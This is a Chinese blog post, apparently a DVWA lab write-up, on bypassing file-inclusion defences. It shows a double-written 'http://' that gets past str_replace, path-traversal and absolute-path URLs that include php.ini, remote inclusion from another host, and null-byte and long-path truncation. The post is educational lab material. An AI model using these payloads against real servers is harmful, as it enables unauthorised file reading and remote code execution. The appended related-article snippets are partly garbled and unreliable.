文件包含漏洞之——str_replace函数绕过与——包含截断绕过

最新推荐文章于 2024-05-04 10:37:19 发布
最新推荐文章于 2024-05-04 10:37:19 发布
阅读量6.3k 收藏 6
点赞数 2
分类专栏: web渗透测试与代码审计 #+ 文件包含漏洞 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43079958/article/details/105398623
版权

str_replace函数绕过

目录

实验环境DVWA,安全性medium
有时程序员会使用str_replace函数进行防御,这个函数是极其不安全的,因为可以使用双写绕过替换规则轻松绕过

绕过方法

例如page=hthttp://tp://192.168.0.103/phpinfo.txt时,str_replace函数会将http://删除,于是page=http://192.168.0.103/phpinfo.txt,成功执行远程命令。

同时,因为替换的只是“…/”、“…\”,所以对采用绝对路径的方式包含文件是不会受到任何限制的。

三个实例

1、本地文件包含
http://192.168.0.103/dvwa/vulnerabilities/fi/page=…/./…/./…/./…/./…/./…/./…/./…/./…/./…/./xampp/htdocs/dvwa/php.ini
2、绝对路径不受任何影响
http://192.168.0.103/dvwa/vulnerabilities/fi/page=C:/xampp/htdocs/dvwa/php.ini
3、远程文件包含
http://192.168.0.103/dvwa/vulnerabilities/fi/page=htthttp://p://192.168.5.12/phpinfo.txt

包含截断绕过

防御代码

		<?php
	if(isset($_GET['page'])){
		include $_GET['page'] .".php" ;
	}else{
		include 'home.php';
	}
?>

判断参数是否赋值,假如赋值了,包含参数变量, 加.’’.php’'用来防御,如果没有复制,包含home.php
这种方法只适合于magic_quotes_gpc=off的时候,
php版本小于5.3.4,可通过%00截断绕过,不过现在已经很难见到了,比如:

index.php?file=info.txt//…………超过一定数据的/。

个人想法

有时候对防御手段的绕过不仅仅是想如何不被拦截,而是要想着去利用可能的防御手段,将他人的手段占为己用,这样就可以轻松绕过一些防御了

温柔小薛
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php str_replace替换漏洞
10-30
php 的函数str_replace替换漏洞
包含漏洞str_replace函数绕过
arissa666的博客
09-22 382
函数绕过(双写就可以绕过)DWVA中等级别的时候会有防御过滤,过滤之后之前的本地远程包含就会发生执行错误。
最新PHP CTF常见考题的绕过技巧_str_replace函数绕过(1)
最新发布
05-04 685
PHP中md5()函数无法处理数组(会返回NULL)==的也可以用数组绕过
PHP花式绕过大全
热门推荐
fly夏天的博客
10-18 1万+
做了这么长的时间的ctf,现在总结一下自己做过的题,记录一下各种可能会存在绕过的php函数,持续跟新。 各位大佬可以一起交流♂交流。 1.preg_replace ($pattern , $replacement , $subject ) 其中 $pattern为正则表达式 $replacement为替换字符串 $subject 为要搜索...
php str_replace的bug
不说不可能
08-03 1499
昨天意外调用了下str_replace接口,最后一个参数传入一个常数,之前以为是表示传入这个常数,php只进行这么多次替换。 结果php部运行了,折腾了一个晚上,最后将svn中代码与修改的代码比较,将修改的内容回退,php运行正常。 奇怪,反复实验,最后确认str_replace传入常数导致无法运行。也奇怪,php不报错,也没有运行时错误。。。。 估计php怒了 更多认知,感悟...
PHP CTF常见考题的绕过技巧
m0_48108919的博客
04-07 1万+
1.===绕过 PHP比较运算符 ===在进行比较的时候,会先判断两种字符串的类型是否相等,再比较值是否相等。 只要两边字符串类型不同会返回false
str_pos php,关于php中str_replace替换漏洞的分析
weixin_39900468的博客
03-13 183
这篇文章主要介绍了关于php中str_replace替换漏洞的分析,有着一定的参考价值,现在分享给大家,有需要的朋友可以参考一下定义和用法str_replace() 函数使用一个字符串替换字符串中的另一些字符。语法str_replace(find,replace,string,count)参数 描述find 必需。规定要查找的值。replace 必需。规定替换 find 中的值的值。string ...
解析web文件操作常见安全漏洞(目录、文件名检测漏洞)
10-27
攻击者可以通过编码手段(例如 `%2F` 代表 `/`)绕过过滤,从而访问到系统中的任意文件,如在例子中成功包含了`/etc/passwd`。 为了防御目录遍历攻击,应当遵循以下原则: 1. 不要依赖于参数过滤,而应进行严格的...
sql_函数大全_比较常用的一些函数整理[借鉴].pdf
10-12
SQL函数在数据库查询中起着至关重要的作用,它们允许我们对数据进行各种处理,包括转换、提取、比较和操作字符串。以下是对SQL中一些常见函数的详细解释: 1. **字符转换函数**: - `ASCII()`:返回一个字符的...
PHP利用str_replace防注入的方法
12-19
PHP各种过滤字符函数复制代码 代码如下:   <?php    /**    * 安全过滤函数    *    * @param $string    * @return string    */    function safe_replace($string) {    $string = str_replace(‘ ’,”,$string);    $string = str_replace(‘'’,”,$string);    $string = str_replace(‘'’,”,$string);    $string = str_replace(‘*’,”,$s
ORACLE 系统函数大全SQLSERVER系统函数的异同
09-11
本文将对比分析Oracle和SQL Server在系统函数上的异同,特别是字符函数、日期函数以及转换函数。 1. **字符函数** - `ASCII`:在Oracle和SQL Server中,这两个函数都是用来将字符转换为相应的ASCII码。 - `...
Python常用内置函数总结
09-22
2. `str.replace(old, new[, maxreplace])`:将字符串中old子串替换为new,可选参数maxreplace指定替换次数,例如`'hello'.replace('l', '2')`返回'he22o'。 3. `str.split([sep[, maxsplit]])`:根据分隔符sep将...
C#中英文混合字符串截取函数
01-01
/// 截断字符串 /// /// 最大长度 /// <param name=str>原字符串 /// <returns></returns> public static string CutStr(int maxLength, string str) { string temp = str; if (Regex.Replace(temp, [\u4...
str_replace导致的注入问题汇总
weixin_30455365的博客
08-05 436
    研究了下replace的注入安全问题。     一般sql注入的过滤方式就是引用addslashes函数进行过滤。 他会把注入的单引号转换成\',把双引号转换成\",反斜杠会转换成\\等   写一段php代码: <!DOCTYPE html> <html> <head> <title>&lt...
php 替换 tab,php中str_replace替换实例讲解
weixin_36180471的博客
03-09 425
在对于字符串的替换上,我们已经学过了不少的方法。但在做练习题的时候,我们会对多个字符串进行替换。从方法的实用性来说,str_replace就非常适合处理多个字符串的替换问题。下面我们就php中str_replace的概念、语法、参数、返回值进行讲解,然后带来替换的实例分享。1、概念str_replace() 函数以其他字符替换字符串中的一些字符(区分大小写)。该函数区分大小写。请使用 str_ir...
str_replace()
qq_42572322的博客
07-11 554
str_replace(array(),array(),$info);
str_replace() 函数
weixin_34032779的博客
02-09 104
定义和用法str_replace() 函数以其他字符替换字符串中的一些字符(区分大小写)语法str_replace(find,replace,string,count)参数解析参数描述find必需。规定要查找的值。replace必需。规定替换find中的值的值。string必需。规定被搜索的字符串。count可选。对替换数进行计数的变量。示例<?php $a...
str_replace函数用法
07-22
str_replace函数是一个字符串替换函数,在C语言中可以使用该函数替换字符串中的指定内容。它的基本用法如下: ```c #include <string.h> char* str_replace(char* source, const char* find, const char* replace); ``` 该函数接受三个参数:源字符串source,要查找的字符串find,以及要替换成的字符串replace函数会在源字符串中查找所有与find相匹配的子串,并将其替换replace函数返回一个指向修改后的源字符串的指针。注意,源字符串会被修改,因此调用该函数后,源字符串的内容会发生改变。 下面是一个示例代码,演示了如何使用str_replace函数: ```c #include <stdio.h> #include <string.h> int main() { char source[100] = "Hello, world!"; const char* find = "world"; const char* replace = "CSDN"; char* result = str_replace(source, find, replace); printf("替换前的字符串: %s\n", source); printf("替换后的字符串: %s\n", result); return 0; } ``` 运行上述示例代码,输出结果如下: ``` 替换前的字符串: Hello, world! 替换后的字符串: Hello, CSDN! ``` 这样就完成了将源字符串中的"world"替换为"CSDN"的操作。注意,函数只会替换所有匹配到的子串,如果没有匹配到则不会进行替换。此外,str_replace函数是区分大小写的。如果需要进行大小写不敏感的替换,可以使用其他函数或自定义实现。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值